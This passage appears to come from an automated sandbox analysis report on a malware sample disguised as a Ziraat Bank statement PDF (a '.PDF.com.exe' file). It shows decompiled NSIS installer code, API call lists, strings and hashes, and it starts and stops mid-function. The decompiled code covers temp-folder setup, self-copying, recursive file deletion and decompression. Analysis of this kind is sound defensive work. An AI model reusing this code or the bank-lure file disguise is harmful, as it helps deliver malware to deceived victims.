                                                  																		CloseHandle(_t152);
                                                  																		_v8 = 0;
                                                  																	}
                                                  																}
                                                  															}
                                                  															 *0x42b800 =  *0x42b800 + 1;
                                                  															_t61 =  &_v12;
                                                  															 *_t61 = _v12 - 1;
                                                  															__eflags =  *_t61;
                                                  														} while ( *_t61 != 0);
                                                  														E00406428(_t201, _t234, 0);
                                                  														goto L67;
                                                  													}
                                                  												}
                                                  												 *_t218 = _t188;
                                                  												_t221 =  &(_t218[2]);
                                                  												_t157 = E0040603F(_t263,  &(_t218[2]));
                                                  												_t264 = _t157;
                                                  												if(_t157 == 0) {
                                                  													goto L68;
                                                  												}
                                                  												E00406668(L"C:\\Users\\FRONTD~1\\AppData\\Local\\Temp", _t221);
                                                  												E00406668(L"C:\\Users\\FRONTD~1\\AppData\\Local\\Temp", _t221);
                                                  												_v8 = _t188;
                                                  												goto L51;
                                                  											}
                                                  											asm("cdq");
                                                  											asm("cdq");
                                                  											asm("cdq");
                                                  											_t204 = ( *0x40a33a & 0x0000ffff) << 0x00000010 | L" _?=" & 0x0000ffff;
                                                  											_t167 = ( *0x40a33e & 0x0000ffff) << 0x00000010 |  *0x40a33c & 0x0000ffff | (_t209 << 0x00000020 |  *0x40a33e & 0x0000ffff) << 0x10;
                                                  											while( *_t218 != _t204 || _t218[1] != _t167) {
                                                  												_t218 = _t218;
                                                  												if(_t218 >= L"\"C:\\Users\\frontdesk\\Desktop\\T.C.Ziraat Bankasi A.S_Ekstre_20191102_073809_405251-PDF.com.exe\"") {
                                                  													continue;
                                                  												}
                                                  												break;
                                                  											}
                                                  											_t188 = 0;
                                                  											goto L48;
                                                  										}
                                                  										GetWindowsDirectoryW(_t234, 0x3fb);
                                                  										lstrcatW(_t234, L"\\Temp");
                                                  										_t170 = E0040360F(_t198, _t252);
                                                  										_t253 = _t170;
                                                  										if(_t170 != 0) {
                                                  											goto L40;
                                                  										}
                                                  										GetTempPathW(0x3fc, _t234);
                                                  										lstrcatW(_t234, L"Low");
                                                  										SetEnvironmentVariableW(L"TEMP", _t234);
                                                  										SetEnvironmentVariableW(L"TMP", _t234);
                                                  										_t175 = E0040360F(_t198, _t253);
                                                  										_t254 = _t175;
                                                  										if(_t175 == 0) {
                                                  											goto L68;
                                                  										}
                                                  										goto L40;
                                                  									}
                                                  									goto L31;
                                                  								}
                                                  								__eflags =  *((intOrPtr*)(_t198 + 4)) - _t226;
                                                  								if( *((intOrPtr*)(_t198 + 4)) != _t226) {
                                                  									goto L29;
                                                  								}
                                                  								_t177 =  *((intOrPtr*)(_t198 + 8));
                                                  								__eflags = _t177 - 0x20;
                                                  								if(_t177 == 0x20) {
                                                  									L28:
                                                  									_t36 =  &_v20;
                                                  									 *_t36 = _v20 | 0x00000004;
                                                  									__eflags =  *_t36;
                                                  									goto L29;
                                                  								}
                                                  								__eflags = _t177 - _t188;
                                                  								if(_t177 != _t188) {
                                                  									goto L29;
                                                  								}
                                                  								goto L28;
                                                  							}
                                                  							_t178 =  *((intOrPtr*)(_t198 + 2));
                                                  							__eflags = _t178 - _t209;
                                                  							if(_t178 == _t209) {
                                                  								L23:
                                                  								 *0x42a300 = 1;
                                                  								goto L24;
                                                  							}
                                                  							__eflags = _t178 - _t188;
                                                  							if(_t178 != _t188) {
                                                  								goto L24;
                                                  							}
                                                  							goto L23;
                                                  						}
                                                  					} else {
                                                  						goto L16;
                                                  					}
                                                  					do {
                                                  						L16:
                                                  						_t198 = _t198 + 2;
                                                  						__eflags =  *_t198 - _t209;
                                                  					} while ( *_t198 == _t209);
                                                  					goto L17;
                                                  				}
                                                  				goto L37;
                                                  			}



















































                                                  0x00403a69
                                                  0x00403a6e
                                                  0x00403a70
                                                  0x00403a78
                                                  0x00403a78
                                                  0x00403a83
                                                  0x00403a88
                                                  0x00403a8f
                                                  0x00403a95
                                                  0x00403a97
                                                  0x00403b6a
                                                  0x00403b6a
                                                  0x00403b6a
                                                  0x00000000
                                                  0x00403a9d
                                                  0x00403a9d
                                                  0x00403a9f
                                                  0x00403aa0
                                                  0x00403aa9
                                                  0x00403aa2
                                                  0x00403aa2
                                                  0x00403aa2
                                                  0x00403aaf
                                                  0x00403ab7
                                                  0x00403abe
                                                  0x00403ac6
                                                  0x00403ac6
                                                  0x00403ad3
                                                  0x00403adf
                                                  0x00403ae9
                                                  0x00403ae9
                                                  0x00403aeb
                                                  0x00403af2
                                                  0x00403afc
                                                  0x00403b08
                                                  0x00403b0e
                                                  0x00403b14
                                                  0x00403b17
                                                  0x00403b21
                                                  0x00403b27
                                                  0x00403b29
                                                  0x00403b2d
                                                  0x00403b3e
                                                  0x00403b44
                                                  0x00403b49
                                                  0x00403b4b
                                                  0x00403b4e
                                                  0x00403b54
                                                  0x00403b54
                                                  0x00403b4b
                                                  0x00403b29
                                                  0x00403b57
                                                  0x00403b5e
                                                  0x00403b5e
                                                  0x00403b5e
                                                  0x00403b5e
                                                  0x00403b65
                                                  0x00000000
                                                  0x00403b65
                                                  0x00403a97
                                                  0x00403a1b
                                                  0x00403a1e
                                                  0x00403a22
                                                  0x00403a27
                                                  0x00403a29
                                                  0x00000000
                                                  0x00000000
                                                  0x00403a35
                                                  0x00403a40
                                                  0x00403a45
                                                  0x00000000
                                                  0x00403a45
                                                  0x004039c3
                                                  0x004039db
                                                  0x004039ec
                                                  0x004039ed
                                                  0x004039f1
                                                  0x004039f3
                                                  0x00403a01
                                                  0x00403a08
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00403a08
                                                  0x00403a0a
                                                  0x00000000
                                                  0x00403a0a
                                                  0x0040392d
                                                  0x00403939
                                                  0x0040393e
                                                  0x00403943
                                                  0x00403945
                                                  0x00000000
                                                  0x00000000
                                                  0x0040394d
                                                  0x00403955
                                                  0x00403966
                                                  0x0040396e
                                                  0x00403970
                                                  0x00403975
                                                  0x00403977
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00403977
                                                  0x00000000
                                                  0x004038d4
                                                  0x0040387d
                                                  0x0040387f
                                                  0x00000000
                                                  0x00000000
                                                  0x00403881
                                                  0x00403885
                                                  0x00403889
                                                  0x00403890
                                                  0x00403890
                                                  0x00403890
                                                  0x00403890
                                                  0x00000000
                                                  0x00403890
                                                  0x0040388b
                                                  0x0040388e
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x0040388e
                                                  0x00403827
                                                  0x0040382b
                                                  0x0040382e
                                                  0x00403835
                                                  0x00403835
                                                  0x00000000
                                                  0x00403835
                                                  0x00403830
                                                  0x00403833
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00403833
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00403801
                                                  0x00403801
                                                  0x00403802
                                                  0x00403803
                                                  0x00403803
                                                  0x00000000
                                                  0x00403801
                                                  0x00000000

                                                  APIs
                                                  • SetErrorMode.KERNELBASE(00008001), ref: 00403663
                                                  • GetVersionExW.KERNEL32(?), ref: 0040368C
                                                  • GetVersionExW.KERNEL32(0000011C), ref: 004036A3
                                                  • lstrlenA.KERNEL32(UXTHEME,UXTHEME), ref: 0040373A
                                                  • #17.COMCTL32(00000007,00000009,0000000B), ref: 00403776
                                                  • OleInitialize.OLE32(00000000), ref: 0040377D
                                                  • SHGetFileInfoW.SHELL32(00421708,00000000,?,000002B4,00000000), ref: 0040379B
                                                  • GetCommandLineW.KERNEL32(00429260,NSIS Error), ref: 004037B0
                                                  • CharNextW.USER32(00000000,"C:\Users\user\Desktop\T.C.Ziraat Bankasi A.S_Ekstre_20191102_073809_405251-PDF.com.exe",00000020,"C:\Users\user\Desktop\T.C.Ziraat Bankasi A.S_Ekstre_20191102_073809_405251-PDF.com.exe",00000000), ref: 004037E9
                                                  • GetTempPathW.KERNEL32(00000400,C:\Users\user~1\AppData\Local\Temp\,00000000,?), ref: 0040391C
                                                  • GetWindowsDirectoryW.KERNEL32(C:\Users\user~1\AppData\Local\Temp\,000003FB), ref: 0040392D
                                                  • lstrcatW.KERNEL32(C:\Users\user~1\AppData\Local\Temp\,\Temp), ref: 00403939
                                                  • GetTempPathW.KERNEL32(000003FC,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,\Temp), ref: 0040394D
                                                  • lstrcatW.KERNEL32(C:\Users\user~1\AppData\Local\Temp\,Low), ref: 00403955
                                                  • SetEnvironmentVariableW.KERNEL32(TEMP,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,Low), ref: 00403966
                                                  • SetEnvironmentVariableW.KERNEL32(TMP,C:\Users\user~1\AppData\Local\Temp\), ref: 0040396E
                                                  • DeleteFileW.KERNELBASE(1033), ref: 00403982
                                                  • lstrcatW.KERNEL32(C:\Users\user~1\AppData\Local\Temp\,~nsu), ref: 00403A69
                                                  • lstrcatW.KERNEL32(C:\Users\user~1\AppData\Local\Temp\,0040A328), ref: 00403A78
                                                    • Part of subcall function 00405C16: CreateDirectoryW.KERNELBASE(?,00000000,00403633,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,00403923), ref: 00405C1C
                                                  • lstrcatW.KERNEL32(C:\Users\user~1\AppData\Local\Temp\,.tmp), ref: 00403A83
                                                  • lstrcmpiW.KERNEL32(C:\Users\user~1\AppData\Local\Temp\,C:\Users\user\Desktop,C:\Users\user~1\AppData\Local\Temp\,.tmp,C:\Users\user~1\AppData\Local\Temp\,~nsu,"C:\Users\user\Desktop\T.C.Ziraat Bankasi A.S_Ekstre_20191102_073809_405251-PDF.com.exe",00000000,?), ref: 00403A8F
                                                  • SetCurrentDirectoryW.KERNEL32(C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\), ref: 00403AAF
                                                  • DeleteFileW.KERNEL32(00420F08,00420F08,?,0042B000,?), ref: 00403B0E
                                                  • CopyFileW.KERNEL32(C:\Users\user\Desktop\T.C.Ziraat Bankasi A.S_Ekstre_20191102_073809_405251-PDF.com.exe,00420F08,00000001), ref: 00403B21
                                                  • CloseHandle.KERNEL32(00000000,00420F08,00420F08,?,00420F08,00000000), ref: 00403B4E
                                                  • ExitProcess.KERNEL32(?), ref: 00403B6C
                                                  • OleUninitialize.OLE32(?), ref: 00403B71
                                                  • ExitProcess.KERNEL32 ref: 00403B8B
                                                  • GetCurrentProcess.KERNEL32(00000028,?), ref: 00403B9F
                                                  • OpenProcessToken.ADVAPI32(00000000), ref: 00403BA6
                                                  • LookupPrivilegeValueW.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 00403BBA
                                                  • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000), ref: 00403BD9
                                                  • ExitWindowsEx.USER32(00000002,80040002), ref: 00403BFE
                                                  • ExitProcess.KERNEL32 ref: 00403C1F
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.263281094.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.263266862.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.263355807.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.263371497.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.263371497.000000000040E000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.263371497.0000000000425000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.263371497.0000000000427000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.263371497.0000000000435000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.263431713.000000000043B000.00000002.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_T.jbxd
                                                  Similarity
                                                  • API ID: Processlstrcat$ExitFile$Directory$CurrentDeleteEnvironmentPathTempTokenVariableVersionWindows$AdjustCharCloseCommandCopyCreateErrorHandleInfoInitializeLineLookupModeNextOpenPrivilegePrivilegesUninitializeValuelstrcmpilstrlen
                                                  • String ID: "C:\Users\user\Desktop\T.C.Ziraat Bankasi A.S_Ekstre_20191102_073809_405251-PDF.com.exe"$.tmp$1033$C:\Users\user~1\AppData\Local\Temp$C:\Users\user~1\AppData\Local\Temp$C:\Users\user~1\AppData\Local\Temp\$C:\Users\user\Desktop$C:\Users\user\Desktop\T.C.Ziraat Bankasi A.S_Ekstre_20191102_073809_405251-PDF.com.exe$Error launching installer$Error writing temporary file. Make sure your temp folder is valid.$Low$NSIS Error$SeShutdownPrivilege$TEMP$TMP$UXTHEME$\Temp$~nsu
                                                  • API String ID: 2292928366-455684950
                                                  • Opcode ID: e0a8c6016783217a32738e87f4e0326041da0509f66f4411adb9540052cd23fd
                                                  • Instruction ID: d56582c8b11bee4b9d4e83ad1f604629a9588d533935b381636b20c84fba3529
                                                  • Opcode Fuzzy Hash: e0a8c6016783217a32738e87f4e0326041da0509f66f4411adb9540052cd23fd
                                                  • Instruction Fuzzy Hash: D4E1F471A00214AADB20AFB58D45A6E3EB8EB05709F50847FF945B32D1DB7C8A41CB6D
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Control-flow Graph

                                                  control_flow_graph 395 405d74-405d9a call 40603f 398 405db3-405dba 395->398 399 405d9c-405dae DeleteFileW 395->399 401 405dbc-405dbe 398->401 402 405dcd-405ddd call 406668 398->402 400 405f30-405f34 399->400 403 405dc4-405dc7 401->403 404 405ede-405ee3 401->404 410 405dec-405ded call 405f83 402->410 411 405ddf-405dea lstrcatW 402->411 403->402 403->404 404->400 406 405ee5-405ee8 404->406 408 405ef2-405efa call 40699e 406->408 409 405eea-405ef0 406->409 408->400 419 405efc-405f10 call 405f37 call 405d2c 408->419 409->400 414 405df2-405df6 410->414 411->414 415 405e02-405e08 lstrcatW 414->415 416 405df8-405e00 414->416 418 405e0d-405e29 lstrlenW FindFirstFileW 415->418 416->415 416->418 420 405ed3-405ed7 418->420 421 405e2f-405e37 418->421 435 405f12-405f15 419->435 436 405f28-405f2b call 4056ca 419->436 420->404 426 405ed9 420->426 423 405e57-405e6b call 406668 421->423 424 405e39-405e41 421->424 437 405e82-405e8d call 405d2c 423->437 438 405e6d-405e75 423->438 427 405e43-405e4b 424->427 428 405eb6-405ec6 FindNextFileW 424->428 426->404 427->423 431 405e4d-405e55 427->431 428->421 434 405ecc-405ecd FindClose 428->434 431->423 431->428 434->420 435->409 441 405f17-405f26 call 4056ca call 406428 435->441 436->400 446 405eae-405eb1 call 4056ca 437->446 447 405e8f-405e92 437->447 438->428 442 405e77-405e80 call 405d74 438->442 441->400 442->428 446->428 450 405e94-405ea4 call 4056ca call 406428 447->450 451 405ea6-405eac 447->451 450->428 451->428
                                                  C-Code - Quality: 98%
                                                  			E00405D74(void* __eflags, signed int _a4, signed int _a8) {
                                                  				signed int _v8;
                                                  				signed int _v12;
                                                  				short _v556;
                                                  				short _v558;
                                                  				struct _WIN32_FIND_DATAW _v604;
                                                  				signed int _t38;
                                                  				signed int _t52;
                                                  				signed int _t55;
                                                  				signed int _t62;
                                                  				void* _t64;
                                                  				signed char _t65;
                                                  				WCHAR* _t66;
                                                  				void* _t67;
                                                  				WCHAR* _t68;
                                                  				void* _t70;
                                                  
                                                  				_t65 = _a8;
                                                  				_t68 = _a4;
                                                  				_v8 = _t65 & 0x00000004;
                                                  				_t38 = E0040603F(__eflags, _t68);
                                                  				_v12 = _t38;
                                                  				if((_t65 & 0x00000008) != 0) {
                                                  					_t62 = DeleteFileW(_t68); // executed
                                                  					asm("sbb eax, eax");
                                                  					_t64 =  ~_t62 + 1;
                                                  					 *0x42a2e8 =  *0x42a2e8 + _t64;
                                                  					return _t64;
                                                  				}
                                                  				_a4 = _t65;
                                                  				_t8 =  &_a4;
                                                  				 *_t8 = _a4 & 0x00000001;
                                                  				__eflags =  *_t8;
                                                  				if( *_t8 == 0) {
                                                  					L5:
                                                  					E00406668(0x425750, _t68);
                                                  					__eflags = _a4;
                                                  					if(_a4 == 0) {
                                                  						E00405F83(_t68);
                                                  					} else {
                                                  						lstrcatW(0x425750, L"\\*.*");
                                                  					}
                                                  					__eflags =  *_t68;
                                                  					if( *_t68 != 0) {
                                                  						L10:
                                                  						lstrcatW(_t68, 0x40a014);
                                                  						L11:
                                                  						_t66 =  &(_t68[lstrlenW(_t68)]);
                                                  						_t38 = FindFirstFileW(0x425750,  &_v604); // executed
                                                  						_t70 = _t38;
                                                  						__eflags = _t70 - 0xffffffff;
                                                  						if(_t70 == 0xffffffff) {
                                                  							L26:
                                                  							__eflags = _a4;
                                                  							if(_a4 != 0) {
                                                  								_t30 = _t66 - 2;
                                                  								 *_t30 =  *(_t66 - 2) & 0x00000000;
                                                  								__eflags =  *_t30;
                                                  							}
                                                  							goto L28;
                                                  						} else {
                                                  							goto L12;
                                                  						}
                                                  						do {
                                                  							L12:
                                                  							__eflags = _v604.cFileName - 0x2e;
                                                  							if(_v604.cFileName != 0x2e) {
                                                  								L16:
                                                  								E00406668(_t66,  &(_v604.cFileName));
                                                  								__eflags = _v604.dwFileAttributes & 0x00000010;
                                                  								if(__eflags == 0) {
                                                  									_t52 = E00405D2C(__eflags, _t68, _v8);
                                                  									__eflags = _t52;
                                                  									if(_t52 != 0) {
                                                  										E004056CA(0xfffffff2, _t68);
                                                  									} else {
                                                  										__eflags = _v8 - _t52;
                                                  										if(_v8 == _t52) {
                                                  											 *0x42a2e8 =  *0x42a2e8 + 1;
                                                  										} else {
                                                  											E004056CA(0xfffffff1, _t68);
                                                  											E00406428(_t67, _t68, 0);
                                                  										}
                                                  									}
                                                  								} else {
                                                  									__eflags = (_a8 & 0x00000003) - 3;
                                                  									if(__eflags == 0) {
                                                  										E00405D74(__eflags, _t68, _a8);
                                                  									}
                                                  								}
                                                  								goto L24;
                                                  							}
                                                  							__eflags = _v558;
                                                  							if(_v558 == 0) {
                                                  								goto L24;
                                                  							}
                                                  							__eflags = _v558 - 0x2e;
                                                  							if(_v558 != 0x2e) {
                                                  								goto L16;
                                                  							}
                                                  							__eflags = _v556;
                                                  							if(_v556 == 0) {
                                                  								goto L24;
                                                  							}
                                                  							goto L16;
                                                  							L24:
                                                  							_t55 = FindNextFileW(_t70,  &_v604); // executed
                                                  							__eflags = _t55;
                                                  						} while (_t55 != 0);
                                                  						_t38 = FindClose(_t70); // executed
                                                  						goto L26;
                                                  					}
                                                  					__eflags =  *0x425750 - 0x5c;
                                                  					if( *0x425750 != 0x5c) {
                                                  						goto L11;
                                                  					}
                                                  					goto L10;
                                                  				} else {
                                                  					__eflags = _t38;
                                                  					if(_t38 == 0) {
                                                  						L28:
                                                  						__eflags = _a4;
                                                  						if(_a4 == 0) {
                                                  							L36:
                                                  							return _t38;
                                                  						}
                                                  						__eflags = _v12;
                                                  						if(_v12 != 0) {
                                                  							_t38 = E0040699E(_t68);
                                                  							__eflags = _t38;
                                                  							if(_t38 == 0) {
                                                  								goto L36;
                                                  							}
                                                  							E00405F37(_t68);
                                                  							_t38 = E00405D2C(__eflags, _t68, _v8 | 0x00000001);
                                                  							__eflags = _t38;
                                                  							if(_t38 != 0) {
                                                  								return E004056CA(0xffffffe5, _t68);
                                                  							}
                                                  							__eflags = _v8;
                                                  							if(_v8 == 0) {
                                                  								goto L30;
                                                  							}
                                                  							E004056CA(0xfffffff1, _t68);
                                                  							return E00406428(_t67, _t68, 0);
                                                  						}
                                                  						L30:
                                                  						 *0x42a2e8 =  *0x42a2e8 + 1;
                                                  						return _t38;
                                                  					}
                                                  					__eflags = _t65 & 0x00000002;
                                                  					if((_t65 & 0x00000002) == 0) {
                                                  						goto L28;
                                                  					}
                                                  					goto L5;
                                                  				}
                                                  			}



















                                                  APIs
                                                  • DeleteFileW.KERNELBASE(?,?,772EFAA0,772EF560,00000000), ref: 00405D9D
                                                  • lstrcatW.KERNEL32(C:\Users\user~1\AppData\Local\Temp\nsqD5A.tmp\*.*,\*.*), ref: 00405DE5
                                                  • lstrcatW.KERNEL32(?,0040A014), ref: 00405E08
                                                  • lstrlenW.KERNEL32(?,?,0040A014,?,C:\Users\user~1\AppData\Local\Temp\nsqD5A.tmp\*.*,?,?,772EFAA0,772EF560,00000000), ref: 00405E0E
                                                  • FindFirstFileW.KERNELBASE(C:\Users\user~1\AppData\Local\Temp\nsqD5A.tmp\*.*,?,?,?,0040A014,?,C:\Users\user~1\AppData\Local\Temp\nsqD5A.tmp\*.*,?,?,772EFAA0,772EF560,00000000), ref: 00405E1E
                                                  • FindNextFileW.KERNELBASE(00000000,00000010,000000F2,?,?,?,?,0000002E), ref: 00405EBE
                                                  • FindClose.KERNELBASE(00000000), ref: 00405ECD
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.263281094.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.263266862.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.263355807.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.263371497.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.263371497.000000000040E000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.263371497.0000000000425000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.263371497.0000000000427000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.263371497.0000000000435000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.263431713.000000000043B000.00000002.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_T.jbxd
                                                  Similarity
                                                  • API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
                                                  • String ID: .$.$C:\Users\user~1\AppData\Local\Temp\nsqD5A.tmp\*.*$\*.*
                                                  • API String ID: 2035342205-2502937420
                                                  • Opcode ID: eb4081a649fdbb44c8907daec76b44e1c805ca5b036c6d0867ef95af4715127c
                                                  • Instruction ID: 3801e3340fbbb9c460ab277ab089a7ece50ce31247a5b640c745bca9484d7288
                                                  • Opcode Fuzzy Hash: eb4081a649fdbb44c8907daec76b44e1c805ca5b036c6d0867ef95af4715127c
                                                  • Instruction Fuzzy Hash: 46410330800A15AADB21AB61CC49BBF7678EF41715F50413FF881711D1DB7C4A82CEAE
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  C-Code - Quality: 98%
                                                  			E00406D5F() {
                                                  				unsigned short _t531;
                                                  				signed int _t532;
                                                  				void _t533;
                                                  				void* _t534;
                                                  				signed int _t535;
                                                  				signed int _t565;
                                                  				signed int _t568;
                                                  				signed int _t590;
                                                  				signed int* _t607;
                                                  				void* _t614;
                                                  
                                                  				L0:
                                                  				while(1) {
                                                  					L0:
                                                  					if( *(_t614 - 0x40) != 0) {
                                                  						 *(_t614 - 0x34) = 1;
                                                  						 *(_t614 - 0x84) = 7;
                                                  						_t607 =  *(_t614 - 4) + 0x180 +  *(_t614 - 0x38) * 2;
                                                  						L132:
                                                  						 *(_t614 - 0x54) = _t607;
                                                  						L133:
                                                  						_t531 =  *_t607;
                                                  						_t590 = _t531 & 0x0000ffff;
                                                  						_t565 = ( *(_t614 - 0x10) >> 0xb) * _t590;
                                                  						if( *(_t614 - 0xc) >= _t565) {
                                                  							 *(_t614 - 0x10) =  *(_t614 - 0x10) - _t565;
                                                  							 *(_t614 - 0xc) =  *(_t614 - 0xc) - _t565;
                                                  							 *(_t614 - 0x40) = 1;
                                                  							_t532 = _t531 - (_t531 >> 5);
                                                  							 *_t607 = _t532;
                                                  						} else {
                                                  							 *(_t614 - 0x10) = _t565;
                                                  							 *(_t614 - 0x40) =  *(_t614 - 0x40) & 0x00000000;
                                                  							 *_t607 = (0x800 - _t590 >> 5) + _t531;
                                                  						}
                                                  						if( *(_t614 - 0x10) >= 0x1000000) {
                                                  							L139:
                                                  							_t533 =  *(_t614 - 0x84);
                                                  							L140:
                                                  							 *(_t614 - 0x88) = _t533;
                                                  							goto L1;
                                                  						} else {
                                                  							L137:
                                                  							if( *(_t614 - 0x6c) == 0) {
                                                  								 *(_t614 - 0x88) = 5;
                                                  								goto L170;
                                                  							}
                                                  							 *(_t614 - 0x10) =  *(_t614 - 0x10) << 8;
                                                  							 *(_t614 - 0x6c) =  *(_t614 - 0x6c) - 1;
                                                  							 *(_t614 - 0x70) =  &(( *(_t614 - 0x70))[1]);
                                                  							 *(_t614 - 0xc) =  *(_t614 - 0xc) << 0x00000008 |  *( *(_t614 - 0x70)) & 0x000000ff;
                                                  							goto L139;
                                                  						}
                                                  					} else {
                                                  						__eax =  *(__ebp - 0x5c) & 0x000000ff;
                                                  						__esi =  *(__ebp - 0x60);
                                                  						__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
                                                  						__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
                                                  						__ecx =  *(__ebp - 0x3c);
                                                  						__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
                                                  						__ecx =  *(__ebp - 4);
                                                  						(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
                                                  						__eax = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9;
                                                  						__eax = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
                                                  						 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
                                                  						if( *(__ebp - 0x38) >= 4) {
                                                  							if( *(__ebp - 0x38) >= 0xa) {
                                                  								_t97 = __ebp - 0x38;
                                                  								 *_t97 =  *(__ebp - 0x38) - 6;
                                                  							} else {
                                                  								 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
                                                  							}
                                                  						} else {
                                                  							 *(__ebp - 0x38) = 0;
                                                  						}
                                                  						if( *(__ebp - 0x34) == __edx) {
                                                  							__ebx = 0;
                                                  							__ebx = 1;
                                                  							L60:
                                                  							__eax =  *(__ebp - 0x58);
                                                  							__edx = __ebx + __ebx;
                                                  							__ecx =  *(__ebp - 0x10);
                                                  							__esi = __edx + __eax;
                                                  							__ecx =  *(__ebp - 0x10) >> 0xb;
                                                  							__ax =  *__esi;
                                                  							 *(__ebp - 0x54) = __esi;
                                                  							__edi = __ax & 0x0000ffff;
                                                  							__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
                                                  							if( *(__ebp - 0xc) >= __ecx) {
                                                  								 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                                                  								 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                                                  								__cx = __ax;
                                                  								_t216 = __edx + 1; // 0x1
                                                  								__ebx = _t216;
                                                  								__cx = __ax >> 5;
                                                  								 *__esi = __ax;
                                                  							} else {
                                                  								 *(__ebp - 0x10) = __ecx;
                                                  								0x800 = 0x800 - __edi;
                                                  								0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
                                                  								__ebx = __ebx + __ebx;
                                                  								 *__esi = __cx;
                                                  							}
                                                  							 *(__ebp - 0x44) = __ebx;
                                                  							if( *(__ebp - 0x10) >= 0x1000000) {
                                                  								L59:
                                                  								if(__ebx >= 0x100) {
                                                  									goto L54;
                                                  								}
                                                  								goto L60;
                                                  							} else {
                                                  								L57:
                                                  								if( *(__ebp - 0x6c) == 0) {
                                                  									 *(__ebp - 0x88) = 0xf;
                                                  									goto L170;
                                                  								}
                                                  								__ecx =  *(__ebp - 0x70);
                                                  								__eax =  *(__ebp - 0xc);
                                                  								 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                  								__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                  								 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                  								 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                  								_t202 = __ebp - 0x70;
                                                  								 *_t202 =  *(__ebp - 0x70) + 1;
                                                  								 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                  								goto L59;
                                                  							}
                                                  						} else {
                                                  							__eax =  *(__ebp - 0x14);
                                                  							__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
                                                  							if(__eax >=  *(__ebp - 0x74)) {
